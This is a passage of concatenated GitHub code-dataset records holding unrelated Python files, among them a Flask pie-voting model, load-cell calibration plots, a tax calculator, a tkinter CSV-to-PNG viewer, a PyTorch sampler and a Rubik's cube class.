cena\",linewidth=3,linestyle=\"dotted\", color='red')\nplt.plot(x_ass_koord,y_ass_koord2,label=\"Desas cena\")\nplt.legend(loc=\"lower right\")\nplt.show()","repo_name":"skolotaja/Grafiks1","sub_path":"grafiks.py","file_name":"grafiks.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1716094896","text":"from ..config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom ..models import user\n\n\n\n\nclass Pypie:\n def __init__(self, data):\n self.id = data['id']\n self.name = data['name']\n self.filling = data['filling']\n self.crust = data['crust']\n self.votes = data['votes']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.user_id = data['user_id']\n\n @property\n def get_user(self):\n info = {\n \"id\": self.user_id\n }\n return user.User.get_by_id(info)\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM pypies\"\n results = connectToMySQL(\"pie_schema\").query_db(query)\n all_pypies = []\n for pypie_row in results:\n pypie_obj = cls(pypie_row)\n all_pypies.append(pypie_obj)\n return all_pypies\n\n @classmethod\n def get_all_users_pypies(cls, data):\n query = \"SELECT * FROM pypies WHERE user_id = %(id)s\"\n results = connectToMySQL(\"pie_schema\").query_db(query, data)\n\n return results\n\n# @classmethod\n# def increase_votes():\n# query = \"UPDATE pypies SET votes = votes + 1 WHERE id = %(id)s;\"\n# results = connectToMySQL(\"pie_schema\").query_db(query)\n# return results\n\n\n @classmethod\n def get_by_id_2(cls, data):\n query = \"SELECT * FROM users LEFT JOIN pypies ON users.id = pypies.user_id WHERE users.id = %(id)s;\"\n\n results = 
connectToMySQL(\"pie_schema\").query_db(query, data)\n\n user = cls(results[0])\n \n if results[0]['pypies.id'] != None:\n for row in results:\n row_data = {\n \"id\": row['pypies.id'],\n \"name\": row['name'],\n \"filling\": row['filling'],\n \"crust\": row['crust'],\n \"votes\": row['votes'],\n \"created_at\": row['pypies.created_at'],\n \"updated_at\": row['pypies.updated_at'],\n \"user\": user\n }\n\n user.pypies.append(Pypie(row_data))\n\n return user\n\n @classmethod\n def get_one(cls, data):\n query = \"SELECT * FROM pypies WHERE id = %(id)s\"\n results = (connectToMySQL(\"pie_schema\").query_db(query, data))\n row_data = {\n \"id\": results[0]['id'],\n \"name\": results[0]['name'],\n \"filling\": results[0]['filling'],\n \"crust\": results[0]['crust'],\n \"votes\": results[0]['votes'],\n \"created_at\": results[0]['created_at'],\n \"updated_at\": results[0]['updated_at'],\n \"user_id\": results[0]['user_id']\n }\n return cls(row_data)\n\n\n\n @classmethod\n def create(cls, data):\n query = \"INSERT INTO pypies (user_id, name, filling, crust, created_at, updated_at) VALUES (%(user_id)s, %(name)s, %(filling)s, %(crust)s, NOW(), NOW())\"\n return connectToMySQL(\"pie_schema\").query_db(query,data)\n\n\n @classmethod\n def update(cls, data):\n query = \"UPDATE pypies SET name = %(name)s, filling = %(filling)s, crust = %(crust)s, updated_at = NOW() WHERE id = %(id)s\"\n return connectToMySQL(\"pie_schema\").query_db(query, data)\n\n @classmethod\n def delete(cls, data):\n query = \"DELETE FROM pypies WHERE id = %(id)s\"\n return connectToMySQL(\"pie_schema\").query_db(query, data)\n\n @staticmethod\n def validate(post_data):\n is_valid = True\n\n if len(post_data['name']) < 1:\n flash(\"Name is required.\")\n is_valid = False\n \n if len(post_data['filling']) < 1:\n flash(\"Filling is required.\")\n is_valid = False\n \n if len(post_data['crust']) < 1:\n flash(\"Crust is required.\")\n is_valid = False\n\n return is_valid\n\n","repo_name":"TessaP97/Python","sub_path":"pie_exam_crud/flask_app/models/pie.py","file_name":"pie.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28147878870","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom pandas import read_csv\r\nfrom scipy.stats import linregress\r\nimport re\r\n\r\nLC1 = read_csv('LC1.csv')\r\nLC2 = read_csv('LC2.csv')\r\nLC3 = read_csv('LC3.csv')\r\nLC4 = read_csv('LC4.csv')\r\nLC4_extra = read_csv('LC4_Higher_Weights.csv')\r\n\r\n\r\n\r\ndef values(df, column):\r\n \r\n # data from single column\r\n col_data = df[column] \r\n \r\n # replace FALSE s with NaN s then delete NaNs\r\n z = col_data.replace(to_replace=('FALSE','False'), value=np.nan).dropna().map(float)\r\n \r\n # calculate 'gradient' change\r\n z_der = np.asarray([z.iloc[i+1]-z.iloc[i] for i in range(len(z)-1)])\r\n \r\n # find outliers where gradient change is too high (spike)\r\n outliers = np.where(abs(z_der) > 1000) \r\n \r\n # new data from single columm without FALSES and spikes\r\n z_new = np.delete(np.asarray(z), outliers)\r\n \r\n # remove last \r\n z_new = np.delete(z_new, -1)\r\n \r\n print(len(col_data)-len(z_new))\r\n \r\n # calculate graph data\r\n mean = np.average(z_new)\r\n std = np.std(z_new)\r\n \r\n return column, z, z_new, mean, std\r\n\r\nsize = 13\r\np=LC2.iloc[:,16].replace(to_replace=('FALSE','False'), value=np.nan).map(float)\r\nplt.xlabel('Time (s)', size=size)\r\nplt.ylabel('Raw voltage output (mV)', 
size=size)\r\nplt.xticks(fontsize= size)\r\nplt.yticks(fontsize= size)\r\nplt.plot(np.array(list(range(0,len(p))))/80,p, linewidth=2, color='r') # 29 errors\r\n\r\n\"\"\"\r\n# plots each column in df after filtering to check\r\n# it removed spikes\r\nfor column in LC2:\r\n __, z, z_new, mean, std = values(LC2, column)\r\n \r\n fig, ax = plt.subplots()\r\n ax.plot(z_new)\r\n ax.set_title(column)\r\n break\r\n\r\n\"\"\"\r\n\r\n# import scipy.fftpack\r\n# spdata = LC1.iloc[:,2].replace(to_replace='False', value=np.nan).dropna().map(float).to_numpy()\r\n\r\n# N = len(spdata)\r\n\r\n# T = 1.0/87.0\r\n\r\n# x = np.linspace(0.0, N*T, N)\r\n\r\n# y = spdata\r\n\r\n# yf = scipy.fftpack.fft(y)\r\n# xf = np.linspace(0.0, 1.0//(2.0*T), N//2)\r\n \r\n# # fig, ax = plt.subplots()\r\n# # ax.semilogy(xf, (2.0/N * np.abs(yf[:N//2])))\r\n# plt.semilogy(xf, (2.0/N * np.abs(yf[:N//2])))\r\n# plt.show()\r\n \r\n# # spdata = LC1.iloc[:,2].replace(to_replace='False', value=np.nan).dropna().map(float).to_numpy()\r\n# # sp = np.fft.fft(np.sort(spdata))\r\n# # t = np.arange(len(sp))*0.011494\r\n# # freq = np.fft.fftfreq(t.shape[-1])\r\n# # plt.plot(freq, sp.real, freq, sp.imag)\r\n# # plt.show()\r\n \r\ndef plotting_data(LC):\r\n \r\n mass = []\r\n output = []\r\n std_dev= []\r\n \r\n for i in range(len(LC.columns)-1):\r\n \r\n column, z, z_new, mean, std = values(LC, LC.columns[i+1])\r\n \r\n column = re.findall(r\"\\d*\\.\\d*\", column)\r\n \r\n if len(column) != 0:\r\n mass.append(float(column[0]))\r\n \r\n output.append(mean)\r\n std_dev.append(std)\r\n \r\n \r\n return np.asarray(mass), np.asarray(output), np.asarray(std_dev)\r\n\r\n#x, y, std_dev = plotting_data(LC2)\r\n\r\n\r\n#fig, axs = plt.subplots(3)\r\n#fig.suptitle('LC2')\r\n#axs[0].errorbar(mass, mean_output, yerr=std_dev, fmt='o',\r\n# ecolor='orangered', color='steelblue', capsize=2)\r\n#axs[1].plot(z)\r\n#axs[2].plot(z_new)\r\n\r\n\r\n#print(linregress(list(map(float,x)), list(map(float, y))))\r\n#print(linregress(list(map(float,x[5:])), list(map(float, y[5:]))))\r\n#fig, axs = plt.subplots(2)\r\n#fig.suptitle('LC2')\r\n#axs[0].errorbar(x, y, yerr=std_dev, fmt='o',\r\n# ecolor='orangered', color='steelblue', capsize=2)\r\n#axs[0].plot(114.14291370261368*np.linspace(0,5889.38,33) + 112752.45433255972, '-k')\r\n#axs[1].errorbar(x[5:], y[5:], yerr=std_dev[5:], fmt='o',\r\n# ecolor='orangered', color='steelblue', capsize=2)\r\n#axs[1].plot(114.14470649223804*np.linspace(471.56,5890,28) + 112745.17170897644, '-k')\r\n\r\n#----------------------------------------------------------------\r\n# x- are masses\r\n# y- are the load cell outputs\r\n\r\n\r\n\"\"\"LC1\"\"\"\r\nx1, y1, std_dev1 = plotting_data(LC1)\r\nx1 = x1/1E3\r\nslope1, intercept1, r_value1, p_value1, std_error1 = linregress(list(map(float,\r\n x1)), list(map(float, y1)))\r\n\"\"\"LC2\"\"\"\r\nx2, y2, std_dev2 = plotting_data(LC2)\r\nx2 = x2/1E3\r\nslope2, intercept2, r_value2, p_value2, std_error2 = linregress(list(map(float,\r\n x2)), list(map(float,y2)))\r\n\"\"\"LC3\"\"\" \r\nx3, y3, std_dev3 = plotting_data(LC3)\r\nx3 = x3/1E3\r\nslope3, intercept3, r_value3, p_value3, std_error3 = linregress(list(map(float,\r\n x3)), list(map(float, y3)))\r\n\r\n\"\"\"LC4\"\"\"\r\nx4, y4, std_dev4 = plotting_data(LC4)\r\nx4 = x4/1E3\r\nslope4, intercept4, r_value4, p_value4, std_error4 = linregress(list(map(float,\r\n x4)), list(map(float, y4)))\r\n\r\n# uncomment for all plots on 1 graph\r\n\r\n# LC1 plot\r\n# plt.errorbar(x1, y1, yerr=std_dev1, fmt='o',\r\n# capsize=2, color='gold')\r\n# plt.plot(x1, 
intercept1 + slope1*x1, '-',\r\n# color='gold', label='LC1: y={:.4}x + {:.4}'.format(slope1,intercept1))\r\n# plt.xlabel('Mass (kg)')\r\n# plt.ylabel('Output (mV)')\r\n# # LC2 plot\r\n# plt.errorbar(x2, y2, yerr=std_dev2, fmt='o',\r\n# capsize=2, color='cornflowerblue')\r\n# plt.plot(x2, intercept2 + slope2*x2,\r\n# color='cornflowerblue', linestyle='-' ,\r\n# label='LC2: y={:.4}x + {:.4}'.format(slope2,intercept2))\r\n# # LC3 plot\r\n# plt.errorbar(x3, y3, yerr=std_dev3, fmt='o',\r\n# capsize=2, color='yellowgreen')\r\n# plt.plot(x3, intercept3 + slope3*x3,'-', \r\n# color='yellowgreen',label='LC3: y={:.4}x + {:.4}'.format(slope3,intercept3))\r\n# #\r\n# # LC4 plot\r\n# plt.errorbar(x4, y4, yerr=std_dev4, fmt='o',\r\n# capsize=2, color='tomato')\r\n# plt.plot(x4, intercept4 + slope4*x4, '-',\r\n# color='tomato',label='LC4: y={:.4}x + {:.4}'.format(slope4,intercept4))\r\n\r\n# plt.legend(loc = 'upper left')\r\n# plt.show() \r\n\r\nsize=12\r\nplt.errorbar(x1, y1, yerr=std_dev1, fmt='o',\r\n capsize=2, color='gold')\r\nplt.plot(x1, intercept1 + slope1*x1, '-',\r\n color='gold', label='Load cell 1')\r\nplt.xlabel('Force (N)', size=size)\r\nplt.ylabel('Load cell output (mV)', size=size)\r\n# LC2 plot\r\nplt.errorbar(x2, y2, yerr=std_dev2, fmt='o',\r\n capsize=2, color='cornflowerblue')\r\nplt.plot(x2, intercept2 + slope2*x2,\r\n color='cornflowerblue', linestyle='-' ,\r\n label='Load cell 2')\r\n# LC3 plot\r\nplt.errorbar(x3, y3, yerr=std_dev3, fmt='o',\r\n capsize=2, color='yellowgreen')\r\nplt.plot(x3, intercept3 + slope3*x3,'-', \r\n color='yellowgreen',label='Load cell 3')\r\n#\r\n# LC4 plot\r\nplt.errorbar(x4, y4, yerr=std_dev4, fmt='o',\r\n capsize=2, color='tomato')\r\nplt.plot(x4, intercept4 + slope4*x4, '-',\r\n color='tomato',label='Load cell 4')\r\nplt.xticks(fontsize= size)\r\nplt.yticks(fontsize= size)\r\nplt.legend(loc = 'upper left', prop={'size': 10})\r\nplt.show() \r\n\r\n\r\n\"\"\"\r\nfig, axs = plt.subplots(2,2, figsize=(20, 10))\r\naxs[0,0].errorbar(x1, y1, yerr=std_dev1, fmt='o',\r\n capsize=2, color='gold')\r\naxs[0,0].plot(x1, intercept1 + slope1*x1, '--',\r\n color='gold', label='y={:.4}x + {:.4} = '.format(slope1,intercept1))\r\n#axs[0,0].legend(loc=\"upper left\")\r\naxs[0,0].set(ylabel='Ouput (UNITS)')\r\naxs[0,0].text(0.0, 6.5E5, 'y={:.4}x + {:.4}\\nR$^2$={:.7}\\nSE={:.4}'.format(slope1,intercept1,r_value1**2,std_error1), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[0, 0].set_title('LC1')\r\n\r\naxs[0,1].errorbar(x2, y2, yerr=std_dev2, fmt='o',\r\n capsize=2, color='cornflowerblue')\r\naxs[0,1].plot(x2, intercept2 + slope2*x2,\r\n color='cornflowerblue', linestyle='dashed' ,\r\n label='LC2: y={:.4}x + {:.4}'.format(slope2,intercept2))\r\n#axs[0,1].legend(loc=\"upper left\")\r\naxs[0,1].text(0.0, 6.5E5, 'y={:.4}x + {:.4}\\nR$^2$={:.8}\\nSE={:.4}'.format(slope2,intercept2,r_value2**2,std_error2), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[0,1].set_title('LC2')\r\n\r\naxs[1,0].errorbar(x3, y3, yerr=std_dev3, fmt='o',\r\n capsize=2, color='yellowgreen')\r\naxs[1,0].plot(x3, intercept3 + slope3*x3,'--', \r\n color='yellowgreen',label='LC3: y={:.4}x + {:.4}'.format(slope3,intercept3))\r\n#axs[1,0].legend(loc=\"upper left\")\r\naxs[1,0].set(xlabel='Mass (kg)', ylabel='Ouput (UNITS)')\r\naxs[1,0].text(0.0, 4.5E5, 'y={:.4}x {:.4}\\nR$^2$={:.7}\\nSE={:.4}'.format(slope1,intercept3,r_value3**2,std_error3), color='black', \r\n bbox=dict(facecolor='none', 
edgecolor='black', boxstyle='round,pad=1'))\r\naxs[1,0].set_title('LC3')\r\n\r\naxs[1,1].errorbar(x4, y4, yerr=std_dev4, fmt='o',\r\n capsize=2, color='tomato')\r\naxs[1,1].plot(x4, intercept4 + slope4*x4, '--',\r\n color='tomato',label='LC4: y={:.4}x + {:.4}'.format(slope4,intercept4))\r\n#axs[1,1].legend(loc=\"upper left\")\r\naxs[1,1].set(xlabel='Mass (kg)')\r\naxs[1,1].text(0.0, 5.75E5, 'y={:.4}x + {:.4}\\nR$^2$={:.7}\\nSE={:.4}'.format(slope4,intercept4,r_value4**2,std_error4), color='black', \r\n bbox=dict(facecolor='none', edgecolor='black', boxstyle='round,pad=1'))\r\naxs[1,1].set_title('LC4')\r\n\r\nplt.savefig('Loading_Curves.png', bbox_inches='tight')\r\n\r\n# print('std_error1 =', std_error1)\r\n# print('std_error2 =', std_error2)\r\n# print('std_error3 =', std_error3)\r\n# print('std_error4 =', std_error4)\r\n\"\"\"","repo_name":"mtirbhowan/MSci-Project","sub_path":"Data/LC_calibration/loading_curves.py","file_name":"loading_curves.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32605991727","text":"from pyadaptivecards.card import AdaptiveCard\nfrom pyadaptivecards.components import TextBlock\nfrom pyadaptivecards.inputs import Text, Number\nfrom pyadaptivecards.actions import Submit\n\ndef make_card_payload(card):\n \"\"\"Create a attachment payload from a adaptive card instance. \n\n Args:\n card (AdaptiveCard): Instance of the adaptive card for this attachment. \n\n Raises:\n Exception: If card is not a subclass of AdaptiveCard or an instance of\n AdaptiveCard.\n\n Returns:\n dict: A attachment payload containing the specified card. \n \"\"\"\n if not issubclass(type(card), AdaptiveCard) and not isinstance(card, AdaptiveCard):\n raise Exception('card must be either a subclass of AdaptiveCard or an instance of AdaptiveCard')\n \n attachment = {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": card.to_dict(),\n }\n\n return attachment\n\nclass ResponseCard(AdaptiveCard):\n \"\"\"Sample adaptive card created using the pyadaptivecards framework.\n\n You can find out more about pyadaptivecards here: https://github.com/CiscoSE/pyadaptivecards\n \"\"\"\n def __init__(self, name):\n body = []\n actions = []\n\n # Create a greeting using the name provided\n greeting = TextBlock(\"Hey hello {}! 
I am an adaptive card\".format(name))\n body.append(greeting)\n\n # Create a question input\n question = Text('question', placeholder=\"Question\")\n body.append(question)\n\n # Create a submit action\n submit = Submit(title=\"Send the card!\")\n actions.append(submit)\n\n super().__init__(body=body, actions=actions)\n \n\n","repo_name":"sQu4rks/cookiecutter-pywebex-teams-bot","sub_path":"{{ cookiecutter.project_slug }}/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13519502806","text":"if True:\n import pandas as pd\n #\n from python.common.misc import muvt\n\n\nincome_tax_columns = [ \"tax, income\"\n , \"tax, income, labor + pension\"\n , \"tax, income, capital + non-labor\"\n , \"tax, income, dividend\"\n ]\n\ndef income_taxes( ppl ):\n \"\"\"Add income tax columns to ppl.\nPITFALL: The exemption for earners claiming dependents is not implemented.\"\"\"\n new_columns = pd.DataFrame()\n temp_columns = pd.DataFrame()\n temp_columns[\"taxable income, labor + pension\"] = (\n ( ppl[\"income, pension\"]\n + ( ppl[\"income, labor\"]\n - ppl[\"tax, ss, total employee contribs\"] )\n ).apply( lambda x: x - min( 0.325 * x, 5040 * muvt) )\n )\n new_columns[\"tax, income, labor + pension\"] = (\n temp_columns[\"taxable income, labor + pension\"].apply( lambda x:\n 0 if x < (1090*muvt)\n else ( (x - 1090*muvt)*0.19 if x < (1700*muvt)\n else ( (x - 1700*muvt)*0.28 + 116*muvt if x < (4100*muvt)\n else (x - 4100*muvt)*0.33 + 788*muvt ) ) ) )\n\n temp_columns[\"taxable income, capital\"] = (\n ppl[\"income, rental + interest\"].apply(\n lambda x: x - min( 0.1 * x, 1000*muvt)\n ) )\n temp_columns[\"taxable income, non-labor (tax def)\"] = (\n ppl[\"income, non-labor (tax def)\"].apply(\n lambda x: x - min( 0.1 * x, 1000*muvt)\n ) )\n\n new_columns[\"tax, income, capital + non-labor\"] = (\n ( temp_columns[\"taxable income, capital\"]\n + temp_columns[\"taxable income, non-labor (tax def)\"]\n ).apply( lambda x:\n 0 if x < ( 600*muvt)\n else ( (x - 600 *muvt)*0.1 if x < (1000*muvt)\n else ( (x - 1000*muvt)*0.2 + 40 *muvt if x < (2000*muvt)\n else ( (x - 2000*muvt)*0.3 + 240*muvt if x < (3000*muvt)\n else ( (x - 3000*muvt)*0.35 + 540*muvt if x < (4000*muvt)\n else (x - 4000*muvt)*0.4 + 870*muvt ) ) ) ) ) )\n\n new_columns[\"tax, income, dividend\"] = (\n ppl[\"income, dividend\"].apply( lambda x:\n 0 if x < ( 600*muvt)\n else ( (x - 600*muvt) * 0.05 if x < (1000*muvt)\n else (x - 1000*muvt) * 0.1 + 20*muvt ) ) )\n new_columns[\"tax, income\"] = (\n new_columns.sum( axis = 1 ) )\n\n return pd.concat( [ppl, new_columns], axis = 1 )\n","repo_name":"ofiscal/tax.co","sub_path":"python/regime/r2016.py","file_name":"r2016.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"36039373164","text":"import matplotlib.pyplot as plt\nimport csv\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom tkinter.filedialog import asksaveasfile\nimport webbrowser\nimport os\nimport shutil\n\n\ncsv_path = \"\"\npng_path = \"\"\ndefault_path = os.getcwd() + \"\\image.png\"\n\nwindow = Tk()\nimage_label = Label(window, width = 640, height = 480)\n\n\n\ndef application(): # creates application with tkinter and calls functions according to user input\n global window\n global image_label\n window.geometry(\"640x500\")\n p1 = PhotoImage(file = \"icon.png\")\n window.iconphoto(False, p1)\n 
window.title(\"CSV to PNG converter\")\n    menubar = Menu(window)\n    filemenu = Menu(menubar, tearoff = 0)\n    filemenu.add_command(label = \"Open\", command = browse_files)\n    filemenu.add_command(label = \"Save as...\", command = save_file)\n\n    menubar.add_cascade(label = \"File\", menu = filemenu)\n\n    helpmenu = Menu(menubar, tearoff = 0)\n    helpmenu.add_command(label = \"About...\", command=open_github)\n    menubar.add_cascade(label = \"Help\", menu = helpmenu)\n\n    \n    image_label.pack()\n    \n    \n    window.config(menu = menubar)\n    window.mainloop()\n\n\n\ndef open_github(): # opens github page of project\n    webbrowser.open(\"https://github.com/MarcUbb/microscope_controller\")\n\n\n\ndef load_image(): # opens csv and interprets and displays it with matplotlib, also saves image to default directory\n    global csv_path\n    global window\n    global image_label\n    global default_path\n\n    image = []\n\n    with open(csv_path, newline='\\n') as csvfile:\n        data = csv.reader(csvfile, delimiter=',')\n        \n        for line in data:\n            image.append(line)\n\n    i = 0\n    while i < len(image):\n        j = 0\n        while j < len(image[0]):\n            image[i][j] = int(image[i][j])\n            j += 1\n        i += 1\n    \n    plt.imshow(image, cmap= \"Greys\")\n    plt.savefig(default_path)\n\n    \n    img = PhotoImage(file = default_path)\n    image_label.configure(image = img)\n    image_label.image = img\n\n\n\ndef save_image(): # saves image by moving it from default directory to chosen directory\n    global default_path\n    global png_path\n\n    # asksaveasfile returns an open file object; close it and use its .name\n    # attribute instead of slicing the object's repr to recover the chosen path\n    png_path.close()\n    png_path = png_path.name\n\n    shutil.move(default_path, png_path)\n\n\n\ndef browse_files(): # opens browser dialog to choose a csv file to be opened with \"load_image\" function\n    filepath = filedialog.askopenfilename(initialdir = \"/\", title = \"Select a File\", filetypes = ((\"CSV File\",\"*.csv*\"),(\"all files\",\"*.*\")))\n    global csv_path \n    csv_path = filepath\n\n    global load_image\n\n    load_image()\n\n\n\ndef save_file(): # opens browser dialog to choose saving directory, calls \"save_image\" function\n    filepath = asksaveasfile(initialfile = \"Untitled.png\", defaultextension = \".png\",filetypes = [(\"All Files\",\"*.*\")])\n    global png_path\n    png_path = filepath\n\n    global save_image\n    save_image()\n\n\n\ndef main():\n    application()\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"MarcUbb/microscope_controller","sub_path":"CSVtoPNG/CSVtoPNG.py","file_name":"CSVtoPNG.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74102385127","text":"\"\"\"\r\n@author: harumonia\r\n@license: (C) Copyright 2013-2017, Node Supply Chain Manager Corporation Limited.\r\n@contact: zxjlm233@gmail.com\r\n@software: Pycharm\r\n@file: __init__.py.py\r\n@time: 2020/12/26 13:46\r\n@desc:\r\n\"\"\"\r\nimport os\r\n\r\nfrom flask import Flask\r\nfrom application.blueprints import all_bp\r\nfrom application.extensions import db, migrate\r\nimport application.models\r\nfrom application.settings import config\r\n\r\n\r\ndef create_app(config_name=None):\r\n    if config_name is None:\r\n        config_name = os.getenv('FLASK_CONFIG', 'development')\r\n\r\n    app = Flask('application')\r\n    app.config.from_object(config[config_name])\r\n\r\n    register_extensions(app)\r\n    register_blueprints(app)\r\n    # register_commands(app)\r\n    # register_errors(app)\r\n    # register_template_context(app)\r\n    return app\r\n\r\n\r\ndef register_extensions(app):\r\n    db.init_app(app)\r\n    migrate.init_app(app, db)\r\n\r\n\r\ndef register_blueprints(app):\r\n    for bp in 
all_bp:\r\n app.register_blueprint(bp)\r\n","repo_name":"keyinwu/Hackthon2020-Group-6","sub_path":"hackso/application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8552885868","text":"import os\r\n\r\nimport pandas as pd\r\n\r\nli = []\r\ndirectory = './data'\r\n# 1\r\nfor file in os.listdir(directory):\r\n df_temp = pd.read_csv(directory + '/' + file, index_col=0, header=0)\r\n li.append(df_temp)\r\n\r\ndf = pd.concat(li,axis=0, ignore_index=True)\r\n# df = pd.concat((pd.read_csv(directory+'/'+f, index_col=0, header=0) for f in os.listdir(directory)))\r\n# 2\r\n# shape before (x, 8)\r\ndf = df.drop(['x_t','perf'], axis='columns')\r\n# shape after (x, 6)\r\n\r\n# 3\r\n# a\r\ndf['Month'] = df['Order Date'].str[:2]\r\n# b & c\r\ndf = df.dropna(subset=['Month'])\r\ndf = df[df['Order Date'] != 'Order Date']\r\ndf['Month'] = pd.to_numeric(df['Month'], downcast=\"integer\")\r\n# d\r\ndf['Sum'] = pd.to_numeric(df['Price Each'])*pd.to_numeric(df['Quantity Ordered'], downcast=\"integer\")\r\n# e\r\nmonth_groups = df.groupby(['Month'])\r\nincome_per_month_descending = month_groups['Sum'].sum().sort_values(ascending=False)\r\n# f\r\nincome_per_month_descending.to_csv(\"income_per_month_descending.csv\")\r\n\r\n\r\n\r\n","repo_name":"tdl1304/private-misc","sub_path":"Dataingenior5.semester/PandasTest/oblig3.py","file_name":"oblig3.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13962553925","text":"import sys\nimport cv2\n\nimage = cv2.imread(sys.argv[1])\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ntile=8\nclip=2.0\nclahe = cv2.createCLAHE(clipLimit=clip,tileGridSize=(tile,tile))\nequalised = clahe.apply(gray)\ncv2.imshow(\"CLAHE\", equalised)\ncv2.waitKey(0)\n","repo_name":"AzadehNazemi/computerVision","sub_path":"ClaheEqualisation.py","file_name":"ClaheEqualisation.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36931627392","text":"import itertools\nimport torch\nfrom torch.utils.data.sampler import Sampler\nfrom visualDet3D.networks.utils.registry import SAMPLER_DICT\n\n@SAMPLER_DICT.register_module\nclass TrainingSampler(Sampler):\n \"\"\"\n In training, we only care about the \"infinite stream\" of training data.\n So this sampler produces an infinite stream of indices and\n all workers cooperate to correctly shuffle the indices and sample different indices.\n\n The samplers in each worker effectively produces `indices[worker_id::num_workers]`\n where `indices` is an infinite stream of indices consisting of\n `shuffle(range(size)) + shuffle(range(size)) + ...` (if shuffle is True)\n or `range(size) + range(size) + ...` (if shuffle is False)\n\n Note that this sampler does not shard based on pytorch DataLoader worker id.\n A sampler passed to pytorch DataLoader is used only with map-style dataset\n and will not be executed inside workers.\n But if this sampler is used in a way that it gets execute inside a dataloader\n worker, then extra work needs to be done to shard its outputs based on worker id.\n This is required so that workers don't produce identical data.\n :class:`ToIterableDataset` implements this logic.\n This note is true for all samplers in detectron2.\n \"\"\"\n\n def __init__(self, size: int, rank: int = -1, world_size: int = 
1, shuffle: bool = True):\n \"\"\"\n Args:\n size (int): the total number of data of the underlying dataset to sample from\n shuffle (bool): whether to shuffle the indices or not\n seed (int): the initial seed of the shuffle. Must be the same\n across all workers. If None, will use a random seed shared\n among workers (require synchronization among all workers).\n \"\"\"\n if not isinstance(size, int):\n raise TypeError(f\"TrainingSampler(size=) expects an int. Got type {type(size)}.\")\n if size <= 0:\n raise ValueError(f\"TrainingSampler(size=) expects a positive int. Got {size}.\")\n self._size = size\n self._shuffle = shuffle\n\n self._rank = rank\n self._world_size = world_size\n self.generator = torch.Generator()\n\n def __len__(self):\n return self._size\n\n def __iter__(self):\n start = max(self._rank, 0)\n yield from itertools.islice(self._indices(), start, None, self._world_size)\n\n def _indices(self):\n if self._shuffle:\n yield from torch.randperm(self._size, generator=self.generator).tolist()\n else:\n yield from torch.arange(self._size).tolist()\n","repo_name":"Owen-Liuyuxuan/visualDet3D","sub_path":"visualDet3D/data/dataloader/distributed_sampler.py","file_name":"distributed_sampler.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"33882827015","text":"from rubik.cubiecube import CubieCube\nfrom rubik.pieces import Face, Corner, Edge, Facelet\n\n\nclass FaceCube:\n # Maps corner positions to facelet positions\n CORNER_FACELETS = [\n [Facelet.U9, Facelet.R1, Facelet.F3],\n [Facelet.U7, Facelet.F1, Facelet.L3],\n [Facelet.U1, Facelet.L1, Facelet.B3],\n [Facelet.U3, Facelet.B1, Facelet.R3],\n [Facelet.D3, Facelet.F9, Facelet.R7],\n [Facelet.D1, Facelet.L9, Facelet.F7],\n [Facelet.D7, Facelet.B9, Facelet.L7],\n [Facelet.D9, Facelet.R9, Facelet.B7],\n ]\n # Maps edge positions to facelet positions\n EDGE_FACELETS = [\n [Facelet.U6, Facelet.R2],\n [Facelet.U8, Facelet.F2],\n [Facelet.U4, Facelet.L2],\n [Facelet.U2, Facelet.B2],\n [Facelet.D6, Facelet.R8],\n [Facelet.D2, Facelet.F8],\n [Facelet.D4, Facelet.L8],\n [Facelet.D8, Facelet.B8],\n [Facelet.F6, Facelet.R4],\n [Facelet.F4, Facelet.L6],\n [Facelet.B6, Facelet.L4],\n [Facelet.B4, Facelet.R6],\n ]\n # Maps corner positions to colors\n CORNER_COLORS = [\n [Face.U, Face.R, Face.F],\n [Face.U, Face.F, Face.L],\n [Face.U, Face.L, Face.B],\n [Face.U, Face.B, Face.R],\n [Face.D, Face.F, Face.R],\n [Face.D, Face.L, Face.F],\n [Face.D, Face.B, Face.L],\n [Face.D, Face.R, Face.B],\n ]\n # Maps edge positions to colors\n EDGE_COLORS = [\n [Face.U, Face.R],\n [Face.U, Face.F],\n [Face.U, Face.L],\n [Face.U, Face.B],\n [Face.D, Face.R],\n [Face.D, Face.F],\n [Face.D, Face.L],\n [Face.D, Face.B],\n [Face.F, Face.R],\n [Face.F, Face.L],\n [Face.B, Face.L],\n [Face.B, Face.R],\n ]\n\n def __init__(self, cube_str: str):\n self.pieces = [Face[cube_str[i]] for i in range(54)]\n\n def to_cubie_cube(self) -> CubieCube:\n cubie_cube = CubieCube()\n orientation = 0\n\n 